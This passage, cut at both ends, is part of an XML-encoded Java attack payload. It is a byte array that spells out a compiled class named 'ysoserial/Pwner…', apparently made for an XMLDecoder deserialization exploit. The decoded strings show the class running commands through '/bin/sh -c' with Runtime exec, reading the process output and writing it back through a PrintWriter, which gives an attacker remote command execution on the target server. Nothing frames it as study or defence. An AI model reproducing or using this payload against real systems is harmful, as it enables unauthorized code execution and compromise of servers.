index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void index=\"3006\"><byte>117</byte></void><void index=\"3007\"><byte>116</byte></void><void index=\"3008\"><byte>83</byte></void><void index=\"3009\"><byte>116</byte></void><void index=\"3010\"><byte>114</byte></void><void index=\"3011\"><byte>101</byte></void><void index=\"3012\"><byte>97</byte></void><void index=\"3013\"><byte>109</byte></void><void index=\"3014\"><byte>59</byte></void><void index=\"3015\"><byte>76</byte></void><void index=\"3016\"><byte>106</byte></void><void index=\"3017\"><byte>97</byte></void><void index=\"3018\"><byte>118</byte></void><void index=\"3019\"><byte>97</byte></void><void index=\"3020\"><byte>47</byte></void><void index=\"3021\"><byte>108</byte></void><void index=\"3022\"><byte>97</byte></void><void index=\"3023\"><byte>110</byte></void><void index=\"3024\"><byte>103</byte></void><void index=\"3025\"><byte>47</byte></void><void index=\"3026\"><byte>83</byte></void><void index=\"3027\"><byte>116</byte></void><void index=\"3028\"><byte>114</byte></void><void index=\"3029\"><byte>105</byte></void><void index=\"3030\"><byte>110</byte></void><void index=\"3031\"><byte>103</byte></void><void index=\"3032\"><byte>59</byte></void><void index=\"3033\"><byte>41</byte></void><void index=\"3034\"><byte>86</byte></void><void index=\"3035\"><byte>12</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>10</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>-110</byte></void><void index=\"3040\"><byte>10</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>-117</byte></void><void index=\"3043\"><byte>0</byte></void><void index=\"3044\"><byte>-109</byte></void><void index=\"3045\"><byte>1</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>19</byte></void><void index=\"3048\"><byte>40</byte></void><void index=\"3049\"><byte>76</byte></void><void index=\"3050\"><byte>106</byte></void><void index=\"3051\"><byte>97</byte></void><void index=\"3052\"><byte>118</byte></void><void index=\"3053\"><byte>97</byte></void><void index=\"3054\"><byte>47</byte></void><void index=\"3055\"><byte>105</byte></void><void index=\"3056\"><byte>111</byte></void><void index=\"3057\"><byte>47</byte></void><void index=\"3058\"><byte>82</byte></void><void index=\"3059\"><byte>101</byte></void><void index=\"3060\"><byte>97</byte></void><void index=\"3061\"><byte>100</byte></void><void index=\"3062\"><byte>101</byte></void><void index=\"3063\"><byte>114</byte></void><void index=\"3064\"><byte>59</byte></void><void index=\"3065\"><byte>41</byte></void><void index=\"3066\"><byte>86</byte></void><void index=\"3067\"><byte>12</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>10</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>-107</byte></void><void index=\"3072\"><byte>10</byte></void><void index=\"3073\"><byte>0</byte></void><void index=\"3074\"><byte>-119</byte></void><void index=\"3075\"><byte>0</byte></void><void index=\"3076\"><byte>-106</byte></void><void index=\"3077\"><byte>1</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>0</byte></void><void index=\"3080\"><byte>8</byte></void><void index=\"3081\"><byte>0</byte></void><void index=\"3082\"><byte>-104</byte></void><void index=\"3083\"><byte>1</byte></void><void index=\"3084\"><byte>0</byte></void><void index=\"3085\"><byte>8</byte></void><void index=\"3086\"><byte>114</byte></void><void index=\"3087\"><byte>101</byte></void><void index=\"3088\"><byte>97</byte></void><void index=\"3089\"><byte>100</byte></void><void index=\"3090\"><byte>76</byte></void><void index=\"3091\"><byte>105</byte></void><void index=\"3092\"><byte>110</byte></void><void index=\"3093\"><byte>101</byte></void><void index=\"3094\"><byte>12</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>-102</byte></void><void index=\"3097\"><byte>0</byte></void><void index=\"3098\"><byte>90</byte></void><void index=\"3099\"><byte>10</byte></void><void index=\"3100\"><byte>0</byte></void><void index=\"3101\"><byte>-119</byte></void><void index=\"3102\"><byte>0</byte></void><void index=\"3103\"><byte>-101</byte></void><void index=\"3104\"><byte>1</byte></void><void index=\"3105\"><byte>0</byte></void><void index=\"3106\"><byte>9</byte></void><void index=\"3107\"><byte>103</byte></void><void index=\"3108\"><byte>101</byte></void><void index=\"3109\"><byte>116</byte></void><void index=\"3110\"><byte>87</byte></void><void index=\"3111\"><byte>114</byte></void><void index=\"3112\"><byte>105</byte></void><void index=\"3113\"><byte>116</byte></void><void index=\"3114\"><byte>101</byte></void><void index=\"3115\"><byte>114</byte></void><void index=\"3116\"><byte>1</byte></void><void index=\"3117\"><byte>0</byte></void><void index=\"3118\"><byte>23</byte></void><void index=\"3119\"><byte>40</byte></void><void index=\"3120\"><byte>41</byte></void><void index=\"3121\"><byte>76</byte></void><void index=\"3122\"><byte>106</byte></void><void index=\"3123\"><byte>97</byte></void><void index=\"3124\"><byte>118</byte></void><void index=\"3125\"><byte>97</byte></void><void index=\"3126\"><byte>47</byte></void><void index=\"3127\"><byte>105</byte></void><void index=\"3128\"><byte>111</byte></void><void index=\"3129\"><byte>47</byte></void><void index=\"3130\"><byte>80</byte></void><void index=\"3131\"><byte>114</byte></void><void index=\"3132\"><byte>105</byte></void><void index=\"3133\"><byte>110</byte></void><void index=\"3134\"><byte>116</byte></void><void index=\"3135\"><byte>87</byte></void><void index=\"3136\"><byte>114</byte></void><void index=\"3137\"><byte>105</byte></void><void index=\"3138\"><byte>116</byte></void><void index=\"3139\"><byte>101</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>59</byte></void><void index=\"3142\"><byte>12</byte></void><void index=\"3143\"><byte>0</byte></void><void index=\"3144\"><byte>-99</byte></void><void index=\"3145\"><byte>0</byte></void><void index=\"3146\"><byte>-98</byte></void><void index=\"3147\"><byte>10</byte></void><void index=\"3148\"><byte>0</byte></void><void index=\"3149\"><byte>69</byte></void><void index=\"3150\"><byte>0</byte></void><void index=\"3151\"><byte>-97</byte></void><void index=\"3152\"><byte>1</byte></void><void index=\"3153\"><byte>0</byte></void><void index=\"3154\"><byte>19</byte></void><void index=\"3155\"><byte>106</byte></void><void index=\"3156\"><byte>97</byte></void><void index=\"3157\"><byte>118</byte></void><void index=\"3158\"><byte>97</byte></void><void index=\"3159\"><byte>47</byte></void><void index=\"3160\"><byte>105</byte></void><void index=\"3161\"><byte>111</byte></void><void index=\"3162\"><byte>47</byte></void><void index=\"3163\"><byte>80</byte></void><void index=\"3164\"><byte>114</byte></void><void index=\"3165\"><byte>105</byte></void><void index=\"3166\"><byte>110</byte></void><void index=\"3167\"><byte>116</byte></void><void index=\"3168\"><byte>87</byte></void><void index=\"3169\"><byte>114</byte></void><void index=\"3170\"><byte>105</byte></void><void index=\"3171\"><byte>116</byte></void><void index=\"3172\"><byte>101</byte></void><void index=\"3173\"><byte>114</byte></void><void index=\"3174\"><byte>7</byte></void><void index=\"3175\"><byte>0</byte></void><void index=\"3176\"><byte>-95</byte></void><void index=\"3177\"><byte>1</byte></void><void index=\"3178\"><byte>0</byte></void><void index=\"3179\"><byte>5</byte></void><void index=\"3180\"><byte>119</byte></void><void index=\"3181\"><byte>114</byte></void><void index=\"3182\"><byte>105</byte></void><void index=\"3183\"><byte>116</byte></void><void index=\"3184\"><byte>101</byte></void><void index=\"3185\"><byte>12</byte></void><void index=\"3186\"><byte>0</byte></void><void index=\"3187\"><byte>-93</byte></void><void index=\"3188\"><byte>0</byte></void><void index=\"3189\"><byte>71</byte></void><void index=\"3190\"><byte>10</byte></void><void index=\"3191\"><byte>0</byte></void><void index=\"3192\"><byte>-94</byte></void><void index=\"3193\"><byte>0</byte></void><void index=\"3194\"><byte>-92</byte></void><void index=\"3195\"><byte>1</byte></void><void index=\"3196\"><byte>0</byte></void><void index=\"3197\"><byte>19</byte></void><void index=\"3198\"><byte>106</byte></void><void index=\"3199\"><byte>97</byte></void><void index=\"3200\"><byte>118</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>47</byte></void><void index=\"3203\"><byte>108</byte></void><void index=\"3204\"><byte>97</byte></void><void index=\"3205\"><byte>110</byte></void><void index=\"3206\"><byte>103</byte></void><void index=\"3207\"><byte>47</byte></void><void index=\"3208\"><byte>69</byte></void><void index=\"3209\"><byte>120</byte></void><void index=\"3210\"><byte>99</byte></void><void index=\"3211\"><byte>101</byte></void><void index=\"3212\"><byte>112</byte></void><void index=\"3213\"><byte>116</byte></void><void index=\"3214\"><byte>105</byte></void><void index=\"3215\"><byte>111</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>7</byte></void><void index=\"3218\"><byte>0</byte></void><void index=\"3219\"><byte>-90</byte></void><void index=\"3220\"><byte>1</byte></void><void index=\"3221\"><byte>0</byte></void><void index=\"3222\"><byte>3</byte></void><void index=\"3223\"><byte>111</byte></void><void index=\"3224\"><byte>117</byte></void><void index=\"3225\"><byte>116</byte></void><void index=\"3226\"><byte>1</byte></void><void index=\"3227\"><byte>0</byte></void><void index=\"3228\"><byte>21</byte></void><void index=\"3229\"><byte>76</byte></void><void index=\"3230\"><byte>106</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>118</byte></void><void index=\"3233\"><byte>97</byte></void><void index=\"3234\"><byte>47</byte></void><void index=\"3235\"><byte>105</byte></void><void index=\"3236\"><byte>111</byte></void><void index=\"3237\"><byte>47</byte></void><void index=\"3238\"><byte>80</byte></void><void index=\"3239\"><byte>114</byte></void><void index=\"3240\"><byte>105</byte></void><void index=\"3241\"><byte>110</byte></void><void index=\"3242\"><byte>116</byte></void><void index=\"3243\"><byte>83</byte></void><void index=\"3244\"><byte>116</byte></void><void index=\"3245\"><byte>114</byte></void><void index=\"3246\"><byte>101</byte></void><void index=\"3247\"><byte>97</byte></void><void index=\"3248\"><byte>109</byte></void><void index=\"3249\"><byte>59</byte></void><void index=\"3250\"><byte>12</byte></void><void index=\"3251\"><byte>0</byte></void><void index=\"3252\"><byte>-88</byte></void><void index=\"3253\"><byte>0</byte></void><void index=\"3254\"><byte>-87</byte></void><void index=\"3255\"><byte>9</byte></void><void index=\"3256\"><byte>0</byte></void><void index=\"3257\"><byte>107</byte></void><void index=\"3258\"><byte>0</byte></void><void index=\"3259\"><byte>-86</byte></void><void index=\"3260\"><byte>1</byte></void><void index=\"3261\"><byte>0</byte></void><void index=\"3262\"><byte>19</byte></void><void index=\"3263\"><byte>106</byte></void><void index=\"3264\"><byte>97</byte></void><void index=\"3265\"><byte>118</byte></void><void index=\"3266\"><byte>97</byte></void><void index=\"3267\"><byte>47</byte></void><void index=\"3268\"><byte>108</byte></void><void index=\"3269\"><byte>97</byte></void><void index=\"3270\"><byte>110</byte></void><void index=\"3271\"><byte>103</byte></void><void index=\"3272\"><byte>47</byte></void><void index=\"3273\"><byte>84</byte></void><void index=\"3274\"><byte>104</byte></void><void index=\"3275\"><byte>114</byte></void><void index=\"3276\"><byte>111</byte></void><void index=\"3277\"><byte>119</byte></void><void index=\"3278\"><byte>97</byte></void><void index=\"3279\"><byte>98</byte></void><void index=\"3280\"><byte>108</byte></void><void index=\"3281\"><byte>101</byte></void><void index=\"3282\"><byte>7</byte></void><void index=\"3283\"><byte>0</byte></void><void index=\"3284\"><byte>-84</byte></void><void index=\"3285\"><byte>10</byte></void><void index=\"3286\"><byte>0</byte></void><void index=\"3287\"><byte>-83</byte></void><void index=\"3288\"><byte>0</byte></void><void index=\"3289\"><byte>91</byte></void><void index=\"3290\"><byte>1</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>19</byte></void><void index=\"3293\"><byte>106</byte></void><void index=\"3294\"><byte>97</byte></void><void index=\"3295\"><byte>118</byte></void><void index=\"3296\"><byte>97</byte></void><void index=\"3297\"><byte>47</byte></void><void index=\"3298\"><byte>105</byte></void><void index=\"3299\"><byte>111</byte></void><void index=\"3300\"><byte>47</byte></void><void index=\"3301\"><byte>80</byte></void><void index=\"3302\"><byte>114</byte></void><void index=\"3303\"><byte>105</byte></void><void index=\"3304\"><byte>110</byte></void><void index=\"3305\"><byte>116</byte></void><void index=\"3306\"><byte>83</byte></void><void index=\"3307\"><byte>116</byte></void><void index=\"3308\"><byte>114</byte></void><void index=\"3309\"><byte>101</byte></void><void index=\"3310\"><byte>97</byte></void><void index=\"3311\"><byte>109</byte></void><void index=\"3312\"><byte>7</byte></void><void index=\"3313\"><byte>0</byte></void><void index=\"3314\"><byte>-81</byte></void><void index=\"3315\"><byte>1</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>7</byte></void><void index=\"3318\"><byte>112</byte></void><void index=\"3319\"><byte>114</byte></void><void index=\"3320\"><byte>105</byte></void><void index=\"3321\"><byte>110</byte></void><void index=\"3322\"><byte>116</byte></void><void index=\"3323\"><byte>108</byte></void><void index=\"3324\"><byte>110</byte></void><void index=\"3325\"><byte>12</byte></void><void index=\"3326\"><byte>0</byte></void><void index=\"3327\"><byte>-79</byte></void><void index=\"3328\"><byte>0</byte></void><void index=\"3329\"><byte>71</byte></void><void index=\"3330\"><byte>10</byte></void><void index=\"3331\"><byte>0</byte></void><void index=\"3332\"><byte>-80</byte></void><void index=\"3333\"><byte>0</byte></void><void index=\"3334\"><byte>-78</byte></void><void index=\"3335\"><byte>1</byte></void><void index=\"3336\"><byte>0</byte></void><void index=\"3337\"><byte>15</byte></void><void index=\"3338\"><byte>112</byte></void><void index=\"3339\"><byte>114</byte></void><void index=\"3340\"><byte>105</byte></void><void index=\"3341\"><byte>110</byte></void><void index=\"3342\"><byte>116</byte></void><void index=\"3343\"><byte>83</byte></void><void index=\"3344\"><byte>116</byte></void><void index=\"3345\"><byte>97</byte></void><void index=\"3346\"><byte>99</byte></void><void index=\"3347\"><byte>107</byte></void><void index=\"3348\"><byte>84</byte></void><void index=\"3349\"><byte>114</byte></void><void index=\"3350\"><byte>97</byte></void><void index=\"3351\"><byte>99</byte></void><void index=\"3352\"><byte>101</byte></void><void index=\"3353\"><byte>12</byte></void><void index=\"3354\"><byte>0</byte></void><void index=\"3355\"><byte>-76</byte></void><void index=\"3356\"><byte>0</byte></void><void index=\"3357\"><byte>11</byte></void><void index=\"3358\"><byte>10</byte></void><void index=\"3359\"><byte>0</byte></void><void index=\"3360\"><byte>-83</byte></void><void index=\"3361\"><byte>0</byte></void><void index=\"3362\"><byte>-75</byte></void><void index=\"3363\"><byte>1</byte></void><void index=\"3364\"><byte>0</byte></void><void index=\"3365\"><byte>13</byte></void><void index=\"3366\"><byte>83</byte></void><void index=\"3367\"><byte>116</byte></void><void index=\"3368\"><byte>97</byte></void><void index=\"3369\"><byte>99</byte></void><void index=\"3370\"><byte>107</byte></void><void index=\"3371\"><byte>77</byte></void><void index=\"3372\"><byte>97</byte></void><void index=\"3373\"><byte>112</byte></void><void index=\"3374\"><byte>84</byte></void><void index=\"3375\"><byte>97</byte></void><void index=\"3376\"><byte>98</byte></void><void index=\"3377\"><byte>108</byte></void><void index=\"3378\"><byte>101</byte></void><void index=\"3379\"><byte>1</byte></void><void index=\"3380\"><byte>0</byte></void><void index=\"3381\"><byte>29</byte></void><void index=\"3382\"><byte>121</byte></void><void index=\"3383\"><byte>115</byte></void><void index=\"3384\"><byte>111</byte></void><void index=\"3385\"><byte>115</byte></void><void index=\"3386\"><byte>101</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>105</byte></void><void index=\"3389\"><byte>97</byte></void><void index=\"3390\"><byte>108</byte></void><void index=\"3391\"><byte>47</byte></void><void index=\"3392\"><byte>80</byte></void><void index=\"3393\"><byte>119</byte></void><void index=\"3394\"><byte>110</byte></void><void index=\"3395\"><byte>101</byte></void><void index=\"3396\"><byte>114</byte></void><void index=\"3397\"><byte>52</byte></void><void index=\"3398\"><byte>53</byte></void><void index=\"3399\"><byte>52</byte></void><void index=\"3400\"><byte>51</byte></void><void index=\"3401\"><byte>56</byte></void><void index=\"3402\"><byte>51</byte></void><void index=\"3403\"><byte>49</byte></void><void index=\"3404\"><byte>52</byte></void><void index=\"3405\"><byte>50</byte></void><void index=\"3406\"><byte>55</byte></void><void index=\"3407\"><byte>56</byte></void><void index=\"3408\"><byte>57</byte></void><void index=\"3409\"><byte>57</byte></void><void index=\"3410\"><byte>50</byte></void><void index=\"3411\"><byte>1</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>31</byte></void><void index=\"3414\"><byte>76</byte></void><void index=\"3415\"><byte>121</byte></void><void index=\"3416\"><byte>115</byte></void><void index=\"3417\"><byte>111</byte></void><void index=\"3418\"><byte>115</byte></void><void index=\"3419\"><byte>101</byte></void><void index=\"3420\"><byte>114</byte></void><void index=\"3421\"><byte>105</byte></void><void index=\"3422\"><byte>97</byte></void><void index=\"3423\"><byte>108</byte></void><void index=\"3424\"><byte>47</byte></void><void index=\"3425\"><byte>80</byte></void><void index=\"3426\"><byte>119</byte></void><void index=\"3427\"><byte>110</byte></void><void index=\"3428\"><byte>101</byte></void><void index=\"3429\"><byte>114</byte></void><void index=\"3430\"><byte>52</byte></void><void index=\"3431\"><byte>53</byte></void><void index=\"3432\"><byte>52</byte></void><void index=\"3433\"><byte>51</byte></void><void index=\"3434\"><byte>56</byte></void><void index=\"3435\"><byte>51</byte></void><void index=\"3436\"><byte>49</byte></void><void index=\"3437\"><byte>52</byte></void><void index=\"3438\"><byte>50</byte></void><void index=\"3439\"><byte>55</byte></void><void index=\"3440\"><byte>56</byte></void><void index=\"3441\"><byte>57</byte></void><void index=\"3442\"><byte>57</byte></void><void index=\"3443\"><byte>50</byte></void><void index=\"3444\"><byte>59</byte></void><void index=\"3445\"><byte>0</byte></void><void index=\"3446\"><byte>33</byte></void><void index=\"3447\"><byte>0</byte></void><void index=\"3448\"><byte>2</byte></void><void index=\"3449\"><byte>0</byte></void><void index=\"3450\"><byte>3</byte></void><void index=\"3451\"><byte>0</byte></void><void index=\"3452\"><byte>1</byte></void><void index=\"3453\"><byte>0</byte></void><void index=\"3454\"><byte>4</byte></void><void index=\"3455\"><byte>0</byte></void><void index=\"3456\"><byte>1</byte></void><void index=\"3457\"><byte>0</byte></void><void index=\"3458\"><byte>26</byte></void><void index=\"3459\"><byte>0</byte></void><void index=\"3460\"><byte>5</byte></void><void index=\"3461\"><byte>0</byte></void><void index=\"3462\"><byte>6</byte></void><void index=\"3463\"><byte>0</byte></void><void index=\"3464\"><byte>1</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>7</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>2</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>8</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>4</byte></void><void index=\"3475\"><byte>0</byte></void><void index=\"3476\"><byte>1</byte></void><void index=\"3477\"><byte>0</byte></void><void index=\"3478\"><byte>10</byte></void><void index=\"3479\"><byte>0</byte></void><void index=\"3480\"><byte>11</byte></void><void index=\"3481\"><byte>0</byte></void><void index=\"3482\"><byte>1</byte></void><void index=\"3483\"><byte>0</byte></void><void index=\"3484\"><byte>12</byte></void><void index=\"3485\"><byte>0</byte></void><void index=\"3486\"><byte>0</byte></void><void index=\"3487\"><byte>0</byte></void><void index=\"3488\"><byte>47</byte></void><void index=\"3489\"><byte>0</byte></void><void index=\"3490\"><byte>1</byte></void><void index=\"3491\"><byte>0</byte></void><void index=\"3492\"><byte>1</byte></void><void index=\"3493\"><byte>0</byte></void><void index=\"3494\"><byte>0</byte></void><void index=\"3495\"><byte>0</byte></void><void index=\"3496\"><byte>5</byte></void><void index=\"3497\"><byte>42</byte></void><void index=\"3498\"><byte>-73</byte></void><void index=\"3499\"><byte>0</byte></void><void index=\"3500\"><byte>1</byte></void><void index=\"3501\"><byte>-79</byte></void><void index=\"3502\"><byte>0</byte></void><void index=\"3503\"><byte>0</byte></void><void index=\"3504\"><byte>0</byte></void><void index=\"3505\"><byte>2</byte></void><void index=\"3506\"><byte>0</byte></void><void index=\"3507\"><byte>13</byte></void><void index=\"3508\"><byte>0</byte></void><void index=\"3509\"><byte>0</byte></void><void index=\"3510\"><byte>0</byte></void><void index=\"3511\"><byte>6</byte></void><void index=\"3512\"><byte>0</byte></void><void index=\"3513\"><byte>1</byte></void><void index=\"3514\"><byte>0</byte></void><void index=\"3515\"><byte>0</byte></void><void index=\"3516\"><byte>0</byte></void><void index=\"3517\"><byte>47</byte></void><void index=\"3518\"><byte>0</byte></void><void index=\"3519\"><byte>14</byte></void><void index=\"3520\"><byte>0</byte></void><void index=\"3521\"><byte>0</byte></void><void index=\"3522\"><byte>0</byte></void><void index=\"3523\"><byte>12</byte></void><void 